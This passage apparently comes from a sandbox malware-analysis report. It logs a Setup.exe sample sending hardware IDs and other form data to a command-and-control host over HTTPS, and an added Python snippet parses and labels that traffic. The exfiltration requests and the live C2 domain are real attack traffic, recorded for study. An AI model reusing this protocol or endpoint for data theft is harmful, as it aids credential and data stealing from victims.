                                                                                                              Data Ascii: 3a88KxKh6vzlEeceMTmN0KQRJaGGOzXjfExAZwD2arLkqKVQMNfIxtE9xW1UG7e2xX1WxKoZVIdediYGbIUPnsbeyAkox4uQlnTLPFRBr+r/agfE6BkPwRkmIgZslAvZi9jJSHrNjZSAcoN/XVTotcFwT8/vVl2OXmBiAnrUUJCpzdFKX8CZl8dsy2UTXOPynjNExORXU4cXJCgPZJUO2JTBw0N6w46VinuXcldT47PLcAeNpF
                                                                                                              2025-01-05 17:58:15 UTC1369INData Raw: 35 50 77 55 5a 75 63 54 64 68 68 52 6e 46 69 39 72 42 43 57 2b 4e 6b 64 36 41 66 38 55 6b 45 31 50 6a 76 4d 4e 77 53 4d 54 6c 57 55 57 4f 48 69 30 71 44 57 61 65 42 39 2b 4a 78 4d 31 4f 65 4d 71 50 6b 59 42 37 67 33 4e 51 47 36 48 79 77 57 73 48 6d 36 52 35 52 34 49 64 4f 69 38 55 49 6f 74 47 79 63 62 4e 79 77 6b 6f 67 34 36 51 68 6e 36 46 62 6c 74 51 35 4c 66 55 65 45 37 4f 36 56 6c 61 69 78 45 74 49 67 4a 6f 6e 67 66 61 67 73 66 4b 54 33 44 44 79 4e 44 48 64 4a 30 38 43 78 76 4d 74 39 5a 30 53 39 57 6d 59 78 65 65 55 44 64 69 41 6d 37 55 55 4a 43 4f 7a 38 52 4b 65 38 79 4c 6c 6f 78 68 68 57 35 56 56 75 71 67 77 48 5a 4a 79 65 64 4c 58 59 38 59 4c 53 73 4f 61 35 45 50 31 4d 61 45 68 30 35 6f 67 39 44 65 70 6e 36 4f 63 46 6c 4d 37 2f 4c 5a 50 56 36 44 34
                                                                                                              Data Ascii: 5PwUZucTdhhRnFi9rBCW+Nkd6Af8UkE1PjvMNwSMTlWUWOHi0qDWaeB9+JxM1OeMqPkYB7g3NQG6HywWsHm6R5R4IdOi8UIotGycbNywkog46Qhn6FbltQ5LfUeE7O6VlaixEtIgJongfagsfKT3DDyNDHdJ08CxvMt9Z0S9WmYxeeUDdiAm7UUJCOz8RKe8yLloxhhW5VVuqgwHZJyedLXY8YLSsOa5EP1MaEh05og9Depn6OcFlM7/LZPV6D4
                                                                                                              2025-01-05 17:58:15 UTC1369INData Raw: 59 49 53 38 4a 49 74 70 49 31 35 36 4b 6e 77 6c 61 77 4a 79 64 6a 54 47 77 66 31 31 56 36 4b 53 47 62 41 6e 61 70 46 35 62 77 55 5a 75 4c 77 52 71 6b 68 72 66 69 38 6e 4a 52 33 2f 47 68 35 61 48 63 34 68 35 56 31 44 6b 73 63 74 33 56 63 6e 6b 55 56 4b 41 46 43 52 69 53 79 4b 54 45 4a 44 65 69 76 5a 65 65 34 47 39 6e 59 6c 39 67 6d 6f 54 52 4b 47 72 68 6e 52 4c 67 37 77 5a 57 6f 6b 62 4b 79 30 45 61 4a 6f 4e 32 6f 72 43 79 55 70 69 7a 49 79 65 69 33 75 50 63 56 31 66 35 37 76 4e 65 45 48 44 35 56 4d 58 7a 31 34 70 4f 6b 55 36 31 44 7a 58 69 73 66 49 43 30 58 41 68 70 43 41 5a 63 56 6a 48 55 4b 76 74 63 6f 7a 48 34 50 6f 55 46 65 4b 46 43 6f 69 41 6d 2b 52 43 39 65 46 78 38 42 44 66 73 53 4d 6b 6f 35 2b 67 33 78 55 58 2b 71 67 77 33 70 4c 7a 36 51 58 46 34
                                                                                                              Data Ascii: YIS8JItpI156KnwlawJydjTGwf11V6KSGbAnapF5bwUZuLwRqkhrfi8nJR3/Gh5aHc4h5V1Dksct3VcnkUVKAFCRiSyKTEJDeivZee4G9nYl9gmoTRKGrhnRLg7wZWokbKy0EaJoN2orCyUpizIyei3uPcV1f57vNeEHD5VMXz14pOkU61DzXisfIC0XAhpCAZcVjHUKvtcozH4PoUFeKFCoiAm+RC9eFx8BDfsSMko5+g3xUX+qgw3pLz6QXF4
                                                                                                              2025-01-05 17:58:15 UTC1369INData Raw: 48 43 4b 54 42 4a 44 65 69 73 35 41 59 73 32 47 6c 34 70 31 6a 58 74 64 56 75 53 30 7a 58 52 41 78 65 6c 52 57 6f 51 64 4c 79 59 50 63 4a 63 44 32 6f 76 41 68 77 63 77 78 4a 44 65 33 7a 4f 69 63 48 70 4c 39 4b 44 51 4d 31 69 4e 2f 52 6c 51 6a 56 35 32 59 67 5a 74 6e 51 66 59 6a 73 58 49 54 58 37 46 6a 70 4f 43 66 49 39 75 57 31 58 69 75 63 6c 34 56 63 50 70 58 56 75 46 46 69 55 6f 52 53 7a 55 44 38 6a 47 6b 6f 64 38 66 63 79 49 6e 5a 45 7a 6d 6a 4a 4b 47 2b 69 2b 68 69 73 48 7a 2b 70 5a 57 49 30 53 4a 53 6f 45 62 70 6f 50 31 59 2f 43 7a 31 74 78 78 34 43 66 69 58 79 45 65 46 5a 65 36 37 58 43 64 55 69 44 71 68 6c 51 6d 56 35 32 59 69 70 46 6f 55 72 78 76 49 72 59 42 32 6d 44 6a 35 4c 48 4b 38 56 77 55 46 66 6e 76 63 42 36 53 38 6e 74 55 6c 75 4b 47 69 49
                                                                                                              Data Ascii: HCKTBJDeis5AYs2Gl4p1jXtdVuS0zXRAxelRWoQdLyYPcJcD2ovAhwcwxJDe3zOicHpL9KDQM1iN/RlQjV52YgZtnQfYjsXITX7FjpOCfI9uW1Xiucl4VcPpXVuFFiUoRSzUD8jGkod8fcyInZEzmjJKG+i+hisHz+pZWI0SJSoEbpoP1Y/Cz1txx4CfiXyEeFZe67XCdUiDqhlQmV52YipFoUrxvIrYB2mDj5LHK8VwUFfnvcB6S8ntUluKGiI
                                                                                                              2025-01-05 17:58:15 UTC1369INData Raw: 77 6e 52 67 4e 6a 41 51 47 4c 4e 68 5a 47 50 65 34 78 39 56 31 37 69 74 4d 70 35 52 73 54 71 56 31 2f 42 55 47 34 6c 48 53 4c 4d 53 50 47 57 30 64 56 66 66 65 4b 46 6b 63 64 73 79 32 55 54 58 4f 50 79 6e 6a 4e 4f 30 65 42 55 52 59 67 5a 49 43 30 47 63 4a 55 46 32 35 54 4e 79 45 31 33 7a 34 36 52 67 58 4b 41 64 6c 39 63 36 72 6e 4a 66 77 65 4e 70 46 35 50 77 55 5a 75 44 41 35 78 67 77 76 65 6a 64 7a 63 43 57 2b 4e 6b 64 36 41 66 38 55 6b 45 31 6a 6b 75 63 4a 7a 53 38 50 67 56 46 65 54 45 53 6b 6c 44 47 6d 47 41 74 65 42 77 63 39 43 66 38 57 61 6b 6f 6c 68 67 47 35 42 47 36 48 79 77 57 73 48 6d 36 52 76 55 4a 45 4f 4c 57 41 30 64 4a 63 65 32 34 76 47 68 31 59 2b 32 73 69 5a 69 7a 50 64 50 46 56 55 35 72 48 4a 63 6b 37 50 36 56 78 65 68 42 38 6f 4a 67 39 6f
                                                                                                              Data Ascii: wnRgNjAQGLNhZGPe4x9V17itMp5RsTqV1/BUG4lHSLMSPGW0dVffeKFkcdsy2UTXOPynjNO0eBURYgZIC0GcJUF25TNyE13z46RgXKAdl9c6rnJfweNpF5PwUZuDA5xgwvejdzcCW+Nkd6Af8UkE1jkucJzS8PgVFeTESklDGmGAteBwc9Cf8WakolhgG5BG6HywWsHm6RvUJEOLWA0dJce24vGh1Y+2siZizPdPFVU5rHJck7P6VxehB8oJg9o
                                                                                                              2025-01-05 17:58:15 UTC1369INData Raw: 62 56 69 56 41 77 78 49 54 65 33 7a 4f 47 65 31 42 61 35 62 76 4b 66 45 44 48 39 6c 4e 51 6b 78 38 76 4b 51 68 75 6c 41 58 64 6a 4d 76 4f 52 48 7a 4f 6a 35 6d 49 64 73 55 79 45 31 7a 33 38 70 34 7a 5a 73 37 76 56 51 7a 62 58 6a 46 73 48 43 4b 54 42 4a 44 65 69 73 64 44 64 63 6d 46 6e 59 68 77 6c 33 31 56 53 65 2b 2f 7a 47 46 4e 79 4f 46 55 57 6f 77 64 4b 43 51 4f 62 6f 59 42 30 49 58 42 68 77 63 77 78 4a 44 65 33 7a 4f 6d 61 30 56 52 36 4c 37 51 65 45 62 41 38 6c 52 48 77 56 42 75 4d 77 4a 7a 31 46 44 47 6c 74 33 41 56 6a 37 61 79 4a 6d 4c 4d 39 30 38 56 56 4c 70 74 63 42 39 56 63 62 69 56 6c 69 49 46 79 6f 71 42 6d 4b 51 44 4e 65 44 79 63 74 43 64 38 43 48 6d 6f 35 39 6a 48 4d 54 46 61 2b 31 33 6a 4d 66 67 38 56 43 56 49 30 54 62 6a 31 4c 65 39 51 50 33
                                                                                                              Data Ascii: bViVAwxITe3zOGe1Ba5bvKfEDH9lNQkx8vKQhulAXdjMvORHzOj5mIdsUyE1z38p4zZs7vVQzbXjFsHCKTBJDeisdDdcmFnYhwl31VSe+/zGFNyOFUWowdKCQOboYB0IXBhwcwxJDe3zOma0VR6L7QeEbA8lRHwVBuMwJz1FDGlt3AVj7ayJmLM908VVLptcB9VcbiVliIFyoqBmKQDNeDyctCd8CHmo59jHMTFa+13jMfg8VCVI0Tbj1Le9QP3
                                                                                                              2025-01-05 17:58:15 UTC1369INData Raw: 4a 4b 49 4f 6f 6c 5a 46 32 67 6d 6f 52 62 75 79 38 79 48 52 52 67 2f 74 6d 47 63 45 66 62 6e 6f 38 65 39 51 65 6b 4e 36 59 69 51 6c 69 67 39 44 65 77 48 43 58 62 6c 56 59 2b 62 47 42 54 58 6e 6b 38 6c 4e 51 6b 52 6b 35 4c 55 55 73 31 41 65 51 33 76 4f 48 51 48 66 59 6d 59 69 4b 59 34 49 38 62 42 57 76 71 6f 59 72 42 2f 62 6e 56 31 6d 47 43 44 39 76 49 6e 53 65 44 38 43 42 33 63 67 4a 50 6f 4f 4f 33 74 38 67 79 7a 78 58 53 71 2f 71 6c 69 45 63 6c 72 63 4f 42 39 4d 42 59 44 74 46 64 4e 52 51 67 73 69 4b 31 51 6b 6f 67 38 2b 64 6c 57 47 44 66 30 56 59 71 49 7a 34 56 46 33 4f 34 6b 35 47 76 79 41 70 4f 41 68 6b 67 78 6d 63 6b 38 6e 4a 52 33 66 56 79 4e 44 48 66 4d 55 6b 61 68 75 6e 38 76 6b 39 42 39 75 6b 41 52 65 30 48 53 41 73 41 6e 53 46 52 66 65 63 78 38
                                                                                                              Data Ascii: JKIOolZF2gmoRbuy8yHRRg/tmGcEfbno8e9QekN6YiQlig9DewHCXblVY+bGBTXnk8lNQkRk5LUUs1AeQ3vOHQHfYmYiKY4I8bBWvqoYrB/bnV1mGCD9vInSeD8CB3cgJPoOO3t8gyzxXSq/qliEclrcOB9MBYDtFdNRQgsiK1Qkog8+dlWGDf0VYqIz4VF3O4k5GvyApOAhkgxmck8nJR3fVyNDHfMUkahun8vk9B9ukARe0HSAsAnSFRfecx8
                                                                                                              2025-01-05 17:58:15 UTC1369INData Raw: 79 4d 62 48 4e 49 5a 75 51 56 33 73 70 4d 55 30 65 66 33 44 56 31 43 41 43 44 34 31 43 6c 79 71 48 64 4f 49 78 4d 42 66 59 59 50 47 33 6f 67 7a 33 55 55 54 45 36 2b 4e 69 44 4e 66 67 37 77 5a 59 6f 49 51 49 43 55 54 63 39 6b 76 33 6f 48 4c 30 56 6c 6e 7a 4d 6a 51 78 33 58 46 4a 41 45 56 72 37 62 58 4d 78 2b 54 74 67 49 43 30 6b 6c 2b 63 42 6f 73 6a 55 6a 47 78 70 4b 56 42 7a 44 52 79 4d 62 48 4e 49 5a 75 51 56 33 73 70 4d 55 30 65 66 33 44 56 31 43 41 43 44 34 31 43 69 32 36 50 76 47 34 39 4e 4a 4b 66 73 32 50 69 4a 59 7a 79 7a 78 63 47 37 65 4c 68 6a 73 48 2f 4b 6f 5a 54 38 46 47 62 68 63 47 62 4a 6f 50 78 70 65 48 34 45 64 33 77 70 36 4f 6b 48 7a 4b 55 6d 56 36 72 2f 79 47 64 51 65 62 74 68 63 58 68 51 39 75 65 6c 55 77 7a 31 32 44 30 5a 71 56 56 6a 37
                                                                                                              Data Ascii: yMbHNIZuQV3spMU0ef3DV1CACD41ClyqHdOIxMBfYYPG3ogz3UUTE6+NiDNfg7wZYoIQICUTc9kv3oHL0VlnzMjQx3XFJAEVr7bXMx+TtgIC0kl+cBosjUjGxpKVBzDRyMbHNIZuQV3spMU0ef3DV1CACD41Ci26PvG49NJKfs2PiJYzyzxcG7eLhjsH/KoZT8FGbhcGbJoPxpeH4Ed3wp6OkHzKUmV6r/yGdQebthcXhQ9uelUwz12D0ZqVVj7
                                                                                                              2025-01-05 17:58:15 UTC1369INData Raw: 79 76 46 55 55 46 63 2f 37 47 47 50 51 66 50 70 41 45 58 6a 41 77 70 4d 67 59 75 6b 78 4c 58 78 74 57 4a 55 44 44 56 79 4d 62 55 50 63 56 75 45 77 4f 76 39 63 68 2b 52 73 44 71 57 6b 57 54 47 43 30 30 42 69 57 71 4e 76 32 55 7a 64 64 4b 4d 76 4b 46 6d 70 46 6d 68 6d 78 55 5a 64 47 66 31 48 52 58 77 4b 5a 31 55 49 77 53 45 42 77 79 63 35 4d 59 6b 71 44 4a 30 55 6f 77 6a 63 69 47 78 79 76 46 55 55 46 63 2f 37 47 45 58 30 44 4f 36 42 6c 49 7a 77 64 75 4e 45 55 36 78 30 61 51 6c 49 71 66 43 54 66 41 6d 6f 79 42 63 4a 4e 2f 46 47 58 52 6e 39 52 30 56 38 43 6d 61 46 71 46 43 44 73 68 46 57 57 71 4e 76 32 55 7a 64 64 4b 4d 75 61 79 33 4c 5a 6c 68 6e 78 64 58 4b 2f 38 68 6d 73 48 6d 36 52 30 52 59 59 4f 4c 57 41 67 57 4e 59 35 78 6f 58 4b 79 55 34 77 6a 63 69 53
                                                                                                              Data Ascii: yvFUUFc/7GGPQfPpAEXjAwpMgYukxLXxtWJUDDVyMbUPcVuEwOv9ch+RsDqWkWTGC00BiWqNv2UzddKMvKFmpFmhmxUZdGf1HRXwKZ1UIwSEBwyc5MYkqDJ0UowjciGxyvFUUFc/7GEX0DO6BlIzwduNEU6x0aQlIqfCTfAmoyBcJN/FGXRn9R0V8CmaFqFCDshFWWqNv2UzddKMuay3LZlhnxdXK/8hmsHm6R0RYYOLWAgWNY5xoXKyU4wjciS


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              2 | 192.168.2.5 | 49723 | 104.21.64.1 | 443 | 6576 | C:\Users\user\Desktop\Setup.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2025-01-05 17:58:16 UTC | 277 | OUT | POST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=EH35OOWNHHMN
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 12797
                                                                                                              Host: displayclubby.sbs
                                                                                                              2025-01-05 17:58:16 UTC12797OUTData Raw: 2d 2d 45 48 33 35 4f 4f 57 4e 48 48 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 39 39 45 42 39 36 34 36 46 38 34 36 31 31 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 45 48 33 35 4f 4f 57 4e 48 48 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 48 33 35 4f 4f 57 4e 48 48 4d 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41 53 0d 0a 2d 2d 45 48 33 35 4f 4f 57 4e 48 48 4d 4e 0d 0a 43 6f
                                                                                                              Data Ascii: --EH35OOWNHHMNContent-Disposition: form-data; name="hwid"C99EB9646F84611709E39FEBDE2EA801--EH35OOWNHHMNContent-Disposition: form-data; name="pid"2--EH35OOWNHHMNContent-Disposition: form-data; name="lid"hRjzG3--GAS--EH35OOWNHHMNCo
                                                                                                              2025-01-05 17:58:16 UTC | 1128 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Sun, 05 Jan 2025 17:58:16 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=u0glb3pvgsk8rno7ouatub7vsi; expires=Thu, 01 May 2025 11:44:55 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tAeYULrabjJzb9KQu0cftvhokFExyCCVN4LGYTWUVWhG4AoXOZf7hlmvzSwGtAJQXQAGuWynTXzFvyZCMq21QSb2DlOF8BvbHz3vuu9BHPV5lWvn7YxZLRAKVw2gTHlaQ8B%2B0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fd55b00acaf440d-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1697&rtt_var=649&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13732&delivery_rate=1670480&cwnd=178&unsent_bytes=0&cid=ae9caa12f097468d&ts=560&x=0"
                                                                                                              2025-01-05 17:58:16 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2025-01-05 17:58:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0
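
The two request shapes captured above, the urlencoded `act=recive_message` beacon of session 1 and the multipart `hwid`/`pid`/`lid` upload of session 2, together with the chunked `ok` replies, as an added Python example that is not part of the Joe Sandbox report: it rebuilds the messages from the report's Data Raw / Data Ascii lines (constructed samples; the upload body is cut off in the report after the `lid` field, so only those three fields are reproduced), decodes the chunked reply bodies, parses the multipart fields, and labels each request by the field pattern it carries. The labels `beacon` and `upload` and all function names are this example's own naming; the report does not name the message types, and nothing here interprets what the `j=` value or the trailing IP address in the reply mean.

```python
import re
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs

# Constructed samples, rebuilt from the report's Data Raw / Data Ascii lines.
# The multipart body is truncated in the report after the "lid" field, so only
# the three visible fields are reproduced; boundary and values are verbatim.
BEACON_REQ = (
    b"POST /api HTTP/1.1\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    b" (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    b"Content-Length: 77\r\n"
    b"Host: displayclubby.sbs\r\n\r\n"
    b"act=recive_message&ver=4.0&lid=hRjzG3--GAS&j=efdebde057a1df3f7c15b7f4da907c2d"
)
_BOUNDARY = b"EH35OOWNHHMN"
_FIELDS = [(b"hwid", b"C99EB9646F84611709E39FEBDE2EA801"), (b"pid", b"2"), (b"lid", b"hRjzG3--GAS")]
_UPLOAD_BODY = b"".join(
    b"--" + _BOUNDARY + b'\r\nContent-Disposition: form-data; name="' + k + b'"\r\n\r\n' + v + b"\r\n"
    for k, v in _FIELDS
) + b"--" + _BOUNDARY + b"--\r\n"
UPLOAD_REQ = (
    b"POST /api HTTP/1.1\r\n"
    + b"Content-Type: multipart/form-data; boundary=" + _BOUNDARY + b"\r\n"
    + b"Content-Length: " + str(len(_UPLOAD_BODY)).encode() + b"\r\n"
    + b"Host: displayclubby.sbs\r\n\r\n" + _UPLOAD_BODY
)
# Chunked reply bodies exactly as the report's Data Raw lines show them.
REPLY_OK = bytes.fromhex("32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a")                       # "2\r\nok\r\n0\r\n\r\n"
REPLY_OK_IP = bytes.fromhex("66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a 30 0d 0a 0d 0a")


def split_message(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP message into (start line, lower-cased header map, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def decode_chunked(body: bytes) -> bytes:
    """Decode a chunked transfer-encoded body; raise ValueError on truncation."""
    out = bytearray()
    pos = 0
    while True:
        nl = body.find(b"\r\n", pos)
        if nl < 0:
            raise ValueError("missing chunk-size line")
        size = int(body[pos:nl].split(b";", 1)[0].strip(), 16)  # drop chunk extensions
        pos = nl + 2
        if size == 0:
            return bytes(out)  # last-chunk; trailers are ignored
        if body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated chunk")
        out += body[pos:pos + size]
        pos += size + 2


def parse_multipart(content_type: str, body: bytes) -> Dict[str, bytes]:
    """Return {field name: value} for a multipart/form-data body."""
    m = re.search(r"boundary=([^;\s]+)", content_type)
    if not m:
        raise ValueError("multipart body without boundary parameter")
    delimiter = b"--" + m.group(1).encode()
    fields: Dict[str, bytes] = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):  # closing delimiter "--<boundary>--"
            break
        head, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]*)"', head)
        if name:
            fields[name.group(1).decode("latin-1")] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def classify_request(raw: bytes) -> Optional[str]:
    """Label a request 'beacon' or 'upload' from the field pattern in the report, else None."""
    start, headers, body = split_message(raw)
    if not start.startswith("POST "):
        return None
    ctype = headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        params = parse_qs(body.decode("ascii", "replace"))
        # session 1: act=recive_message (sic) together with a lid= value
        if params.get("act") == ["recive_message"] and "lid" in params:
            return "beacon"
    if ctype.startswith("multipart/form-data"):
        # sessions 2 onwards: hwid, pid and lid lead the multipart body
        if {"hwid", "pid", "lid"}.issubset(parse_multipart(ctype, body)):
            return "upload"
    return None


def parse_reply(chunked_body: bytes) -> Tuple[bool, Optional[str]]:
    """Decode the C2 reply; return (starts with 'ok', remaining token such as the IP address)."""
    words = decode_chunked(chunked_body).decode("ascii", "replace").split(maxsplit=1)
    return (bool(words) and words[0] == "ok", words[1] if len(words) > 1 else None)


if __name__ == "__main__":
    for label, raw in (("session 1", BEACON_REQ), ("session 2", UPLOAD_REQ)):
        print(label, "->", classify_request(raw))
    print("reply 1:", parse_reply(REPLY_OK), "reply 2:", parse_reply(REPLY_OK_IP))
```

The chunk sizes are taken from the wire (`2` and `f`, that is 15 bytes for `ok 8.46.123.189`), so a reply whose size line does not match its payload is rejected rather than silently truncated; the multipart parser keys only on `Content-Disposition` names and the boundary from the `Content-Type` header, which is all the report shows.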


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              3 | 192.168.2.5 | 49724 | 104.21.64.1 | 443 | 6576 | C:\Users\user\Desktop\Setup.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2025-01-05 17:58:17 UTC | 284 | OUT | POST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=J2C6QZYMBGK69XZRAJU
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 15081
                                                                                                              Host: displayclubby.sbs
                                                                                                              2025-01-05 17:58:17 UTC15081OUTData Raw: 2d 2d 4a 32 43 36 51 5a 59 4d 42 47 4b 36 39 58 5a 52 41 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 39 39 45 42 39 36 34 36 46 38 34 36 31 31 37 30 39 45 33 39 46 45 42 44 45 32 45 41 38 30 31 0d 0a 2d 2d 4a 32 43 36 51 5a 59 4d 42 47 4b 36 39 58 5a 52 41 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 32 43 36 51 5a 59 4d 42 47 4b 36 39 58 5a 52 41 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 47 41
                                                                                                              Data Ascii: --J2C6QZYMBGK69XZRAJUContent-Disposition: form-data; name="hwid"C99EB9646F84611709E39FEBDE2EA801--J2C6QZYMBGK69XZRAJUContent-Disposition: form-data; name="pid"2--J2C6QZYMBGK69XZRAJUContent-Disposition: form-data; name="lid"hRjzG3--GA
                                                                                                              2025-01-05 17:58:18 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                              Date: Sun, 05 Jan 2025 17:58:17 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=9mo9qi0nubodurru2ahkl45b8b; expires=Thu, 01 May 2025 11:44:56 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sMMxMmSHj3dmv9rp8TmPtJ7rbrg4AzRs7pELPwht8ZQu7UG%2FIqSZBWtkMbPLKj%2BwXrUnHdDexLWWJ0zZlEjR7XFpVrLk6zU4WlrujiPU7qkCM5t5zEX0TuN6wncVzhfUVqgfvw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8fd55b07c8e9de95-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1706&min_rtt=1646&rtt_var=660&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2841&recv_bytes=16023&delivery_rate=1773997&cwnd=242&unsent_bytes=0&cid=2b14e8ecd22b9a61&ts=539&x=0"
                                                                                                              2025-01-05 17:58:18 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2025-01-05 17:58:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                              4 | 192.168.2.5 | 49725 | 104.21.64.1 | 443 | 6576 | C:\Users\user\Desktop\Setup.exe
                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                              2025-01-05 17:58:18 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=QH87QAR8H
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 20511
                                                                                                              Host: displayclubby.sbs
